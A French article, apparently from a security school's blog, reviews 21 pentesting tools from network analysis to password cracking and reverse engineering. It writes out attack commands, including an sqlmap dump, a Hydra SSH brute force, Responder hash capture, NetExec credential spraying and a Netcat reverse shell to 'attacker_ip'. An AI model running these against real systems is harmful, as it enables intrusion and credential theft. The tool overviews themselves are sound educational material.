Top 21 des meilleurs logiciels de hack et de pentesting en 2026

Wireshark capture et décode le trafic réseau en temps réel. Chaque paquet, chaque protocole, chaque échange entre deux machines. C’est l’outil que je sors quand quelque chose ne colle pas sur le réseau : un service qui répond de manière inattendue, un flux chiffré qui ne devrait pas l’être, ou un poste qui communique avec une adresse IP suspecte.

L’outil prend en charge des centaines de protocoles et les mises à jour sont fréquentes. Les filtres d’affichage permettent de cibler exactement ce que vous cherchez (tcp.port == 443 && ip.addr == 10.0.0.5). Sur un pentest réseau, Wireshark complète Nmap : là où Nmap identifie les services, Wireshark montre ce qu’ils font.

En dehors du pentest, Wireshark est aussi utilisé par les administrateurs réseau pour le dépannage. C’est un des rares outils de sécurité qui a une utilité quotidienne même hors contexte offensif.

BloodHound, c’est l’outil qui a transformé le pentest Active Directory. Il utilise la théorie des graphes pour cartographier les relations de privilèges dans un domaine : qui peut accéder à quoi, quels chemins mènent au compte Domain Admin, quelles délégations sont mal configurées. En quelques minutes, il rend visible ce qui prendrait des jours à analyser manuellement.

Sur mes interventions de pentest interne, BloodHound est systématique. Je lance SharpHound (le collecteur) sur le réseau, il interroge l’Active Directory et récupère les relations entre utilisateurs, groupes, machines, GPO. Ensuite, BloodHound affiche les chemins d’escalade de privilèges sous forme de graphe. Un clic, et je vois le chemin le plus court entre le compte compromis et le Domain Admin.

La version 8.0 (Community Edition) a introduit OpenGraph, un framework qui étend l’analyse au-delà d’Active Directory : Entra ID (Azure AD), GitHub, Okta. Pour les environnements hybrides (on-premise + cloud), c’est devenu indispensable. SpecterOps propose aussi BloodHound Enterprise (SaaS) pour les blue teams qui veulent surveiller et remédier les chemins d’attaque en continu.

Impacket est une collection de scripts Python qui permettent d’interagir avec les protocoles réseau Windows : SMB, MSRPC, LDAP, Kerberos, WMI. En pentest, c’est l’outil de mouvement latéral par excellence. Vous avez des identifiants valides ? Impacket vous donne l’accès distant.

Les scripts les plus utilisés en audit : secretsdump.py pour extraire les hash NTLM d’une machine distante ou d’un contrôleur de domaine (DCSync). wmiexec.py pour exécuter des commandes à distance via WMI, sans écrire de fichier sur le disque. psexec.py pour obtenir un shell distant via le service SMB. GetUserSPNs.py pour le Kerberoasting (extraction de tickets de service à cracker hors ligne avec Hashcat).

Ce qui rend Impacket redoutable, c’est qu’il opère au niveau protocolaire. Pas besoin d’installer un agent sur la cible. Pas de fichier déposé. Les commandes transitent par des protocoles légitimes (SMB, WMI). C’est exactement comme ça qu’un attaquant réel se déplace dans un réseau compromis.

Hashcat est le plus rapide des outils de cracking de mots de passe. Sa force : l’utilisation du GPU. Là où un CPU teste quelques millions de combinaisons par seconde, une carte graphique récente en teste des milliards. Sur un GPU Nvidia RTX 4090, Hashcat atteint 164 milliards de hash MD5 par seconde. Le cracking d’un mot de passe de 8 caractères en NTLM prend quelques minutes.

L’outil supporte plus de 350 algorithmes de hash : MD5, SHA-256, bcrypt, NTLM, WPA/WPA2, Kerberos, et bien d’autres. Les modes d’attaque vont du dictionnaire classique à la combinaison hybride (dictionnaire + règles de mutation), en passant par la force brute pure et les attaques par masque.

En pentest, Hashcat intervient quand je récupère des bases de hash (Active Directory, fichiers /etc/shadow, bases de données compromises). Avec la wordlist rockyou.txt et un jeu de règles bien calibré, je casse régulièrement 60 à 70 % des mots de passe d’un domaine en moins d’une heure. C’est la preuve la plus parlante pour convaincre un client de renforcer sa politique de mots de passe.

SQLmap fait une chose, et il la fait très bien : détecter et exploiter les failles d’injection SQL. Vous lui donnez une URL avec un paramètre injectable, et il se charge du reste. Détection du type de base de données (MySQL, PostgreSQL, Oracle, MSSQL, SQLite), extraction des tables, dump des données, et dans certains cas, exécution de commandes sur le serveur.

Un sqlmap -u "http://cible.com/page?id=1" --dbs suffit pour lister les bases de données d’un site vulnérable. C’est rapide, c’est automatisé, et c’est redoutablement efficace sur les applications web qui ne filtrent pas correctement les entrées utilisateur.

En audit, SQLmap me sert de vérification rapide après avoir identifié un point d’injection avec Burp Suite. L’outil confirme l’exploitabilité et me donne la preuve technique pour le rapport. C’est un complément, pas un substitut à l’analyse manuelle.

Nuclei a changé la manière dont on fait du scan de vulnérabilités en pentest. Le concept : des templates YAML, maintenus par une communauté de plus de 5 000 contributeurs, qui décrivent chacun une vérification de sécurité. Vous lancez Nuclei contre une cible, il exécute les templates applicables et produit un rapport. Plus de 9 000 templates sont disponibles : CVE connues, erreurs de configuration, en-têtes de sécurité, fichiers exposés, panels d’administration, technologies détectées.

La vitesse est impressionnante. Nuclei est écrit en Go et exécute des milliers de vérifications en parallèle. Sur un périmètre de 200 sous-domaines, un scan complet prend quelques minutes. Avec Nessus ou OpenVAS, comptez des heures.

En pratique, Nuclei complète les scanners traditionnels. Je l’utilise en début d’intervention pour un balayage large et rapide, avant de concentrer Burp Suite sur les cibles les plus intéressantes. L’intégration avec les autres outils ProjectDiscovery (subfinder pour la découverte de sous-domaines, httpx pour la détection de technologies) crée un pipeline de reconnaissance très efficace.

John the Ripper, c’est l’outil de cracking qui tourne sur n’importe quelle machine. Moins rapide que Hashcat sur les hash classiques (il ne tire pas parti du GPU de la même façon), mais plus polyvalent sur les formats exotiques. John prend en charge plus de 300 formats de hash, y compris des formats spécifiques que Hashcat ne gère pas : fichiers ZIP protégés, PDF chiffrés, clés SSH, wallets crypto.

La version « Jumbo » (maintenue par la communauté) ajoute des dizaines de formats supplémentaires et des optimisations. C’est la version que tout le monde utilise en pratique.

Sur le terrain, John et Hashcat sont complémentaires. Hashcat pour la vitesse brute sur les gros volumes de hash NTLM ou SHA. John pour les formats spécifiques que Hashcat ne supporte pas. Les deux utilisent les mêmes wordlists et les mêmes règles de mutation.

Hydra est un outil de brute force en ligne : il teste des combinaisons identifiant/mot de passe directement sur des services réseau. SSH, FTP, HTTP, RDP, MySQL, SMB, VNC, SMTP. Plus de 50 protocoles sont supportés.

La différence avec Hashcat ou John : Hydra attaque le service en direct, pas un fichier de hash. Ça simule exactement ce qu’un attaquant ferait pour deviner un mot de passe sur un service exposé.

Quand je trouve un service SSH ou RDP exposé sur Internet lors d’un audit, Hydra est l’outil que je lance. Un hydra -l admin -P wordlist.txt ssh://cible suffit pour tester des milliers de combinaisons. Si le mot de passe est faible et qu’il n’y a pas de protection contre le brute force (fail2ban, verrouillage de compte), Hydra le trouvera.

Responder exploite un comportement natif de Windows : quand une machine ne trouve pas un nom sur le DNS, elle envoie une requête en broadcast via LLMNR et NBT-NS. Responder intercepte ces requêtes et répond plus vite que le serveur légitime. La machine victime s’authentifie alors auprès de l’attaquant, qui capture le hash NTLMv2.

En pentest interne, Responder est souvent la première action après la prise de pied dans le réseau. Je lance responder -I eth0 et j’attends. En quelques minutes, des hash commencent à arriver. Des postes qui cherchent un partage mal nommé, un serveur d’impression qui n’existe plus, un alias DNS mal configuré. Ces hash sont ensuite passés dans Hashcat pour être crackés, ou relayés directement vers un autre service via ntlmrelayx (un outil d’Impacket).

C’est l’outil qui montre le plus clairement à un client pourquoi les protocoles LLMNR et NBT-NS doivent être désactivés. Le résultat est immédiat et la démonstration est convaincante.

NetExec (anciennement CrackMapExec, renommé après un changement de mainteneur) est un outil d’énumération et d’exploitation Active Directory. Il combine dans une seule interface ce que vous feriez avec 10 scripts Impacket séparés : scan SMB, test d’identifiants sur tout un réseau, dump de LSASS, Kerberoasting, AS-REP Roasting, énumération de partages, exécution de commandes distantes.

La commande qui résume tout : nxc smb 10.0.0.0/24 -u utilisateur -p motdepasse --shares. En une ligne, NetExec teste les identifiants sur toutes les machines du sous-réseau et liste les partages accessibles. Ajoutez --lsa pour extraire les secrets LSA, --sam pour dumper les hash locaux, --bloodhound pour collecter les données BloodHound directement.

Sur le terrain, NetExec me sert dans la phase de propagation. J’ai un premier jeu d’identifiants (récupéré via Responder ou Hashcat), et NetExec me permet de tester rapidement où ces identifiants donnent accès. C’est la boucle : Responder capture, Hashcat cracke, NetExec propage, BloodHound visualise.

Nessus scanne un réseau et produit un rapport détaillé des vulnérabilités détectées : logiciels obsolètes, erreurs de configuration, CVE connues, ports ouverts non sécurisés. C’est l’outil que les équipes sécurité utilisent pour avoir une vision globale de l’exposition d’un système.

La version Essentials est gratuite (16 IP max). La version Professional (environ 3 990 $/an) supprime les limites et ajoute les audits de conformité (PCI DSS, HIPAA, CIS Benchmarks). C’est un outil orienté défensif, mais les pentesters l’utilisent aussi en phase de reconnaissance pour identifier rapidement les cibles les plus vulnérables.

Sur les audits à large périmètre, Nessus me fait gagner du temps. Le scan identifie les machines avec des versions de services vulnérables, et je concentre ensuite mon exploitation sur ces cibles. Le rapport généré est aussi directement utilisable pour le livrable client.

Netcat fait tout et rien à la fois. Transfert de fichiers entre machines, ouverture de shells distants, scan de ports basique, création de tunnels réseau, débogage de services. C’est un outil de bas niveau qui manipule les connexions TCP et UDP brutes.

En pentest, Netcat sert dans les phases de post-exploitation. Vous avez un accès initial sur une machine : Netcat vous permet d’ouvrir un reverse shell vers votre poste d’attaque, de transférer des fichiers, ou de pivoter vers d’autres segments du réseau. Un nc -lvnp 4444 sur votre machine, un nc -e /bin/bash attacker_ip 4444 sur la cible, et vous avez un shell interactif.

La variante Ncat (développée par le projet Nmap) ajoute le support SSL/TLS et les connexions via proxy. C’est la version que j’utilise en priorité.

Nikto scanne un serveur web et identifie les problèmes courants : versions de logiciels obsolètes, fichiers de configuration exposés, en-têtes de sécurité manquants, répertoires par défaut accessibles. L’outil teste plus de 7 000 vérifications et se met à jour régulièrement.

C’est un scan rapide, pas un scan profond. Nikto ne trouvera pas une faille de logique métier ou une injection SQL complexe. En revanche, il repère en quelques minutes les erreurs de configuration que beaucoup de développeurs laissent en production : un dossier /admin accessible, un fichier phpinfo.php oublié, un serveur Apache avec le listing de répertoire activé.

Avant de sortir Burp Suite, je passe souvent Nikto en premier. Ça me donne une vue rapide de la surface d’attaque web.

Snort surveille le trafic réseau en temps réel et alerte quand il détecte un comportement suspect. C’est un IDS (système de détection d’intrusions) qui peut aussi fonctionner en IPS (prévention). Scans de ports, tentatives de brute force, exploits connus, communications vers des serveurs de commande et contrôle (C2) : Snort détecte tout ça grâce à des règles personnalisables.

En tant que pentester, Snort est l’outil que je vois du côté défensif. C’est ce qui me détecte quand je lance un scan ou un exploit. Connaître Snort et ses règles, c’est aussi savoir comment les contourner. Et c’est ce que nous enseignons à Guardia : comprendre les deux côtés du miroir.

La communauté de règles Snort est massive. Et depuis le rachat par Cisco, Snort 3 a apporté une architecture multithreadée plus performante et une syntaxe de règles simplifiée.

Quand Nessus est devenu payant pour les professionnels, OpenVAS a pris le relais. C’est un scanner de vulnérabilités complet, intégré à la suite Greenbone Vulnerability Management (GVM). Il scanne les systèmes, détecte les failles et produit des rapports détaillés.

La couverture est correcte pour un outil gratuit. OpenVAS est mis à jour régulièrement avec de nouvelles signatures de vulnérabilités (NVT). L’installation est plus complexe que Nessus (Docker recommandé), mais une fois configuré, l’outil fait le travail.

Aircrack-ng est une suite d’outils pour tester la sécurité des réseaux sans fil. Capture de paquets Wi-Fi, déauthentification de clients, cracking de clés WPA/WPA2, et depuis les mises à jour récentes, support de l’analyse WPA3.

Quand le périmètre d’un test d’intrusion inclut le Wi-Fi de l’entreprise, c’est Aircrack-ng que je sors. Un réseau Wi-Fi mal configuré (WPA2 avec un mot de passe faible, SSID caché mais détectable, absence de 802.1X) représente souvent une porte d’entrée plus facile que l’infrastructure filaire.

L’outil nécessite une carte Wi-Fi compatible avec le mode monitor. C’est une contrainte matérielle à prévoir. Sur Kali Linux, la plupart des cartes Alfa Network fonctionnent nativement.

Ghidra est un framework de rétro-ingénierie développé par la NSA et rendu open source en 2019. Décompilateur, désassembleur, analyse de binaires multi-architecture (x86, ARM, MIPS, PowerPC…), scripting Java et Python. C’est la réponse gratuite à IDA Pro, qui coûte plusieurs milliers d’euros.

Le décompilateur de Ghidra produit du pseudo-C lisible à partir de binaires compilés. La qualité s’est améliorée à chaque version. Pour l’analyse de malware, le reverse de firmware ou l’audit de binaires IoT, Ghidra fait le travail.

Je place Ghidra avant Binary Ninja dans ce comparatif pour une raison simple : il est gratuit, complet, et la communauté de plugins est en pleine croissance. Binary Ninja a une interface plus fluide et une meilleure réactivité au quotidien. IDA Pro reste la référence dans les équipes spécialisées. Le choix dépend de votre budget et de la fréquence à laquelle vous faites du reverse.

Binary Ninja est une plateforme d’analyse de binaires. Quand vous devez comprendre ce que fait un exécutable sans avoir le code source (analyse de malware, reverse engineering de firmware, audit de logiciel embarqué), c’est l’outil qui rend le travail possible.

Son interface est plus moderne que les alternatives historiques (IDA Pro, Ghidra). Le graphe de flux de contrôle est clair, la décompilation est lisible, et l’API Python permet d’automatiser des analyses récurrentes.

Pour les profils qui ne font pas de reverse engineering quotidien, Ghidra est une alternative gratuite très capable (voir ci-dessus). Binary Ninja se justifie quand vous avez besoin de la réactivité de l’interface et de la qualité de la décompilation au quotidien.